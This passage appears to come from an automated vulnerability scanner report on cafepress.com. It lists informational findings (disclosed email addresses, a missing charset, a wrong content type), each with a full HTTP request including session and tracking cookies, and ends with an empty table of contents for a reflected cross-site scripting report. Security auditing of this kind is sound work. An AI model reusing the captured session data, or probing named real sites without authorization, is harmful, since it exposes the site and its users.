Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.7. http://www.cafepress.com/make/custom-stockings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-stockings

Issue detail

The following email address was disclosed in the response:

someemail@cafepress.com

Request

GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.8. http://www.cafepress.com/make/custom-thermos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-thermos

Issue detail

The following email address was disclosed in the response:

support@cafepress.com

Request

GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.9. http://www.cafepress.com/make/custom-water-bottles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-water-bottles

Issue detail

The following email address was disclosed in the response:

eteamz@CafePress.com

Request

GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.10. http://www.cafepress.com/make/personalized-gifts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/personalized-gifts

Issue detail

The following email address was disclosed in the response:

support@cafepress.com

Request

GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

6.11. http://www.cafepress.com/make/personalized-ornaments previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/personalized-ornaments

Issue detail

The following email address was disclosed in the response:

eteamz@CafePress.com

Request

GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

7. HTML does not specify charset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/moredetails.aspx

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

Response

8. Content type incorrectly stated previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/moredetails.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

Response

Report generated by XSS.CX at Mon Dec 27 10:38:41 CST 2010.

cafepress.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in cafepress.com | Vulnerability Crawler Report

Contents 1. Cross-site scripting (reflected)

Contents

Issue background

Remediation background

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response (redirected)

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Response

Summary

Issue detail

Remediation detail

Request

Contents
1. Cross-site scripting (reflected)